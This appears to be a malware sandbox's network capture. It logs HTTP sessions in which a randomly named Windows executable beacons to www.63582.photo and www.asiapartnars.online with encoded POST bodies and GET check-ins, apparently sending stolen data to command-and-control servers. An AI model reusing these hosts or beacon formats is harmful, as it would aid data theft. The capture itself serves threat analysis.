                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 25, 2024 12:47:34.943531990 CEST224INData Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                                              Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="styles
                                              Sep 25, 2024 12:47:34.943548918 CEST1236INData Raw: 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4f 57 4c 20 43 41 52 4f 55 53 45 4c 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61
                                              Data Ascii: heet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="sty
                                              Sep 25, 2024 12:47:34.943564892 CEST1236INData Raw: 63 72 65 65 6e 20 2d 2d 3e 0a 3c 64 69 76 20 69 64 3d 22 6a 75 2d 6c 6f 61 64 69 6e 67 2d 73 63 72 65 65 6e 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63
                                              Data Ascii: creen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-b
                                              Sep 25, 2024 12:47:34.943578959 CEST1236INData Raw: 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20
                                              Data Ascii: ="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <
                                              Sep 25, 2024 12:47:34.943594933 CEST672INData Raw: 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70
                                              Data Ascii: ="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon t
                                              Sep 25, 2024 12:47:34.943609953 CEST1236INData Raw: 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: haspopup="true" aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                              Sep 25, 2024 12:47:34.943625927 CEST224INData Raw: 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: -item dropdown-toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="
                                              Sep 25, 2024 12:47:34.943639040 CEST1236INData Raw: 23 22 3e 48 65 61 64 65 72 20 31 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d
                                              Data Ascii: #">Header 1</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a
                                              Sep 25, 2024 12:47:34.943654060 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61
                                              Data Ascii: <li><a class="dropdown-item" href="header2-dark.html">Header 2 Dark</a></li> </ul>
                                              Sep 25, 2024 12:47:34.948719978 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                                              Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449754103.248.137.209803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:40.290477991 CEST763OUTPOST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 5a 6b 34 65 2b 4d 76 58 6b 71 6c 63 54 2f 52 76 78 35 33 33 4e 69 4b 35 58 57 35 57 6e 52 38 45 4d 43 63 43 6c 61 6c 63 76 58 6f 62 2b 73 69 72 50 51 47 50 66 43 70 42 74 6f 46 50 54 42 6c 4b 54 62 73 6d 56 65 32 41 78 42 30 63 31 59 71 31 61 6e 79 6b 71 4b 32 37 70 33 61 76 32 2f 56 7a 55 73 58 64 77 75 5a 2b 58 70 38 71 4e 70 75 47 46 57 74 75 62 67 72 57 45 4e 6e 6d 7a 57 4d 63 61 73 4b 56 54 75 4b 4c 33 47 33 2f 39 6f 31 45 56 5a 59 5a 6e 47 50 65 64 46 44 50 7a 34 77 68 77 72 35 51 6a 70 42 41 52 4f 64 2b 49 39 5a 36 57 32 55 55 39 67 3d 3d
                                              Data Ascii: PR_xXrA=+O2xfQVLDeWjZk4e+MvXkqlcT/Rvx533NiK5XW5WnR8EMCcClalcvXob+sirPQGPfCpBtoFPTBlKTbsmVe2AxB0c1Yq1anykqK27p3av2/VzUsXdwuZ+Xp8qNpuGFWtubgrWENnmzWMcasKVTuKL3G3/9o1EVZYZnGPedFDPz4whwr5QjpBAROd+I9Z6W2UU9g==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.449755103.248.137.209803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:42.846831083 CEST783OUTPOST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 4d 45 43 44 73 43 72 37 6c 63 71 58 6f 62 77 4d 69 75 42 77 47 49 66 43 56 7a 74 6f 4a 50 54 46 4e 4b 54 61 63 6d 57 70 43 44 78 52 30 65 36 34 71 33 56 48 79 6b 71 4b 32 37 70 30 6d 46 32 2f 4e 7a 55 64 48 64 78 4d 78 39 61 4a 38 70 64 35 75 47 4f 32 74 69 62 67 72 30 45 49 2f 41 7a 55 30 63 61 70 75 56 51 36 65 49 69 32 33 35 7a 49 31 4b 55 63 6c 54 69 6c 4b 58 44 30 48 76 73 59 45 6a 78 74 6f 4b 79 59 67 58 44 4f 35 4e 56 36 51 4f 62 31 70 64 6d 6d 2b 43 56 47 32 42 78 4b 6f 72 2b 62 76 4b 42 30 2b 51 31 77 59 3d
                                              Data Ascii: PR_xXrA=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkMECDsCr7lcqXobwMiuBwGIfCVztoJPTFNKTacmWpCDxR0e64q3VHykqK27p0mF2/NzUdHdxMx9aJ8pd5uGO2tibgr0EI/AzU0capuVQ6eIi235zI1KUclTilKXD0HvsYEjxtoKyYgXDO5NV6QOb1pdmm+CVG2BxKor+bvKB0+Q1wY=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449756103.248.137.209803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:45.392801046 CEST10865OUTPOST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 45 45 43 78 6b 43 72 59 4e 63 74 58 6f 62 75 63 69 76 42 77 47 5a 66 43 4d 36 74 6f 31 66 54 48 46 4b 54 34 55 6d 43 4e 65 44 2b 52 30 65 78 59 71 32 61 6e 7a 6b 71 4a 4f 6e 70 30 32 46 32 2f 4e 7a 55 65 50 64 32 65 5a 39 4a 35 38 71 4e 70 75 42 46 57 74 4f 62 6b 50 4f 45 4a 4c 50 7a 6e 38 63 5a 4a 2b 56 41 63 69 49 67 57 33 37 2b 6f 30 4d 55 63 68 51 69 6d 75 78 44 30 7a 4a 73 62 59 6a 78 4a 52 4a 72 4c 55 32 51 75 78 53 42 37 6f 79 55 57 52 4e 6e 32 65 74 54 55 32 63 73 65 31 48 38 35 2f 48 55 31 36 6b 69 48 62 7a 51 76 68 59 67 4e 46 55 51 58 63 65 58 50 38 39 63 53 68 52 45 6d 6d 33 37 36 66 41 70 51 2b 4b 79 71 49 48 37 72 4f 4c 6a 54 65 58 4e 6c 39 42 6f 57 6e 45 52 75 43 58 5a 71 70 6d 38 6b 62 57 2f 59 4e 71 65 57 70 70 48 55 43 32 7a 39 42 6d 44 33 62 49 49 55 79 59 4d 5a 34 78 77 7a 73 31 50 7a 71 70 59 45 79 76 76 4d 79 62 38 7a 68 72 42 63 [TRUNCATED]
                                              Data Ascii: PR_xXrA=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkEECxkCrYNctXobucivBwGZfCM6to1fTHFKT4UmCNeD+R0exYq2anzkqJOnp02F2/NzUePd2eZ9J58qNpuBFWtObkPOEJLPzn8cZJ+VAciIgW37+o0MUchQimuxD0zJsbYjxJRJrLU2QuxSB7oyUWRNn2etTU2cse1H85/HU16kiHbzQvhYgNFUQXceXP89cShREmm376fApQ+KyqIH7rOLjTeXNl9BoWnERuCXZqpm8kbW/YNqeWppHUC2z9BmD3bIIUyYMZ4xwzs1PzqpYEyvvMyb8zhrBc99Gi947CyIwqDA0v/MnABM6jDlCpv2c8Wc3/fGpQUFFVfXVdt+UXFKl0iWOcwEnO1tapsKxTEsZUvJbkceg8lYrwRgdKcw+sudFTFXuJV2WgND5x3eC4YhblJpiHUG2jTvxGoVeEBS78ezf4sG4nK3wWKJMOqF4DD2rD8X5EKSoGuWam0E2p4v4lW5r9u4e1s23Mq9KQcCu8sh88MKIpeG1h0cyc+eTmGMTwp6dNQf4YxboEH3FzGlZgPf7fCmCQ7xMI5cYgdylR8xEBhV1qag1DQcShaahRptAYtfwUpDoFl+MXdCYqPzHTastKFGKmNj1uE8zcgeByDXHvEVdLfaXIQRYQtpPEE+Cvhr3VFjlrLZEXsEeHTGFWR6A0GGIoCTasdCODC8qPhWVkw8L5KxbaGDFp7An6/0UG1kfVW9UXMRt90jKlkcjGkrn/uSOLkJcHgMfTz3kCHOqcfPZVPuwUo32hiGY0eTfpXgazTf//vdMCCpbGG7cNS/9w/xmhhxay5VWkTxH1bKpMxGm42D7yRHg3owN9u8PQqdxX1V28GAR1UX21ONOaocmhQaO8UmrNGrIBY059lp7VFYgH7dzfdMKctDBmLnophvxKfjesCWr7wp7NxCGB/q7gR7sHwzSVskzxaK70hk7dZAaIFytXDWClX8Exr6 [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449757103.248.137.209803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:47:48.043497086 CEST507OUTGET /5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.63582.photo
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.4497583.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:22.517416954 CEST787OUTPOST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 204
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 33 42 6d 39 69 4d 2b 62 67 30 34 4a 63 4f 6f 76 6e 6a 54 44 50 35 6c 48 2b 66 77 48 55 52 68 67 38 55 4e 31 42 67 6e 6c 49 52 79 6e 66 4b 42 65 50 52 4b 49 38 32 62 4a 77 33 31 36 65 67 5a 67 7a 63 49 53 6f 65 51 44 5a 35 33 36 2b 35 66 30 51 73 68 32 4d 76 67 4f 75 41 30 4e 78 57 44 32 58 69 2f 59 70 79 49 30 34 32 71 54 31 37 2b 31 33 6a 4c 7a 33 31 49 46 53 4d 51 70 53 4b 51 37 6f 62 53 61 49 4a 42 56 36 67 48 52 2b 58 34 31 44 56 63 38 65 69 6d 63 70 4f 48 51 6f 55 57 6e 68 32 66 70 6a 69 57 50 41 4a 4b 77 6e 41 6f 34 55 63 32 6b 4f 67 3d 3d
                                              Data Ascii: PR_xXrA=6ogxclRqCtxS3Bm9iM+bg04JcOovnjTDP5lH+fwHURhg8UN1BgnlIRynfKBePRKI82bJw316egZgzcISoeQDZ536+5f0Qsh2MvgOuA0NxWD2Xi/YpyI042qT17+13jLz31IFSMQpSKQ7obSaIJBV6gHR+X41DVc8eimcpOHQoUWnh2fpjiWPAJKwnAo4Uc2kOg==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.4497593.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:25.068850040 CEST807OUTPOST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 224
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 31 67 2f 31 39 31 41 69 50 6c 45 78 79 6e 55 71 42 66 52 68 4b 58 38 32 6e 33 77 32 4a 36 65 67 4e 67 7a 65 51 53 6f 70 45 63 59 70 33 38 78 5a 65 79 65 4d 68 32 4d 76 67 4f 75 41 78 6f 78 56 7a 32 4c 43 50 59 72 51 67 37 32 57 71 51 32 37 2b 31 39 44 4c 33 33 31 4a 6f 53 4f 6b 58 53 50 4d 37 6f 66 57 61 5a 34 42 57 6a 51 48 58 36 58 35 69 4c 57 42 6d 57 79 6e 66 6f 4d 47 72 69 58 6d 65 6b 77 4f 7a 79 54 33 59 53 4a 75 44 36 48 68 4d 5a 66 4c 74 56 67 37 63 4d 71 2f 58 46 6b 62 4a 31 54 4b 76 39 75 6e 52 36 62 6f 3d
                                              Data Ascii: PR_xXrA=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVj1g/191AiPlExynUqBfRhKX82n3w2J6egNgzeQSopEcYp38xZeyeMh2MvgOuAxoxVz2LCPYrQg72WqQ27+19DL331JoSOkXSPM7ofWaZ4BWjQHX6X5iLWBmWynfoMGriXmekwOzyT3YSJuD6HhMZfLtVg7cMq/XFkbJ1TKv9unR6bo=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.4497603.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:27.613706112 CEST10889OUTPOST /kt2f/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.asiapartnars.online
                                              Origin: http://www.asiapartnars.online
                                              Content-Length: 10304
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.asiapartnars.online/kt2f/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 50 52 5f 78 58 72 41 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 74 67 38 48 31 31 42 45 48 6c 46 78 79 6e 5a 4b 42 61 52 68 4c 4c 38 32 50 37 77 32 45 50 65 6b 39 67 79 2f 77 53 75 62 38 63 54 70 33 38 70 70 66 31 51 73 67 75 4d 72 46 4a 75 44 5a 6f 78 56 7a 32 4c 41 58 59 39 53 49 37 6d 6d 71 54 31 37 2f 36 33 6a 4c 50 33 30 74 57 53 4e 4a 69 54 37 41 37 70 2f 47 61 4b 71 35 57 38 67 48 56 39 58 35 71 4c 57 4d 34 57 79 72 31 6f 4e 6a 6a 69 51 57 65 6d 6c 76 62 67 43 61 4f 4f 49 53 61 6e 31 5a 59 55 4e 76 71 4f 33 7a 7a 63 59 4c 6c 51 48 4c 6c 76 68 37 56 6f 75 50 6d 70 65 62 38 54 2b 2b 50 70 66 41 36 5a 46 70 4e 6c 74 55 42 62 32 41 74 2f 65 4b 35 47 34 5a 37 61 37 42 42 6d 70 75 55 45 6a 72 45 65 67 30 6a 49 32 67 74 34 43 31 4d 49 74 5a 31 7a 39 57 7a 31 33 7a 65 34 6d 31 76 67 6a 34 78 63 6e 51 2b 74 53 30 6b 36 48 45 66 4c 31 58 7a 6f 42 49 4f 44 62 52 79 79 70 69 55 49 6f 41 30 6a 59 31 2b 49 38 5a 42 41 43 [TRUNCATED]
                                              Data Ascii: PR_xXrA=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVjtg8H11BEHlFxynZKBaRhLL82P7w2EPek9gy/wSub8cTp38ppf1QsguMrFJuDZoxVz2LAXY9SI7mmqT17/63jLP30tWSNJiT7A7p/GaKq5W8gHV9X5qLWM4Wyr1oNjjiQWemlvbgCaOOISan1ZYUNvqO3zzcYLlQHLlvh7VouPmpeb8T++PpfA6ZFpNltUBb2At/eK5G4Z7a7BBmpuUEjrEeg0jI2gt4C1MItZ1z9Wz13ze4m1vgj4xcnQ+tS0k6HEfL1XzoBIODbRyypiUIoA0jY1+I8ZBACWi4m5dWujBkU9GF0P74Qfoe+u8G1w5Y8xEanV7/ljti438HEVIqky2Qy47NhI7Zy5jecn5obLXThuW3y8IseXIyoUP+Mjp8GcHgBRPsLI0ZTgfzuNDWe4Lor2p8LH0cb4EWlBTiX7wfHORArVGi2Q0y6OamLPxNPiK2ovBakbfZA3Bqy2/Pc33visfSDg7vYBUaRmLh63bTnv/e2x4A9Fa2hF1MCk5diFEaNCPkBegQ+zqUNGGLekny8GimGdHwAPQUgTcbjFddpvW48hUimPlbmXlhCI9sRmE2aS0dQfQKnqAqYmle4ALJsp4V3FhK1atgoc8+C0wBQoQuP9q0/38Z0RQTZnoPgcwakJL4AM/3P8ucBprV1mYo12U6zKlIYQh95Z3KwR1YbbQvjDxC2ofC6FJW+A3AsYTeLWKdgQ5ytOPs1EWS5pfKe67mffITAGF7kZeHFMpl3EJi7gXb/M2erkTCMeC9pQQKySCfD7hakmv4Cqq4RHeovaQgtERNJP2/5K8WFtPeDZT0iLm6yWaZ4eyOpE5fIwVRTo3J3TRh6h1kPBZTd+fq7F5uGc329SScRMt5Xs97I4HsmzoeN1QPUCxrv6dje0IqasnZMmPEU4g20Ex1J8BKGdAAW04EOGOILMYiAXk+56yCVjmEiNZ1mYku3wwKi4H [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.4497613.33.130.190803368C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 12:48:30.189023972 CEST515OUTGET /kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.asiapartnars.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 25, 2024 12:48:30.640738964 CEST401INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 25 Sep 2024 10:48:30 GMT
                                              Content-Type: text/html
                                              Content-Length: 261
                                              Connection: close
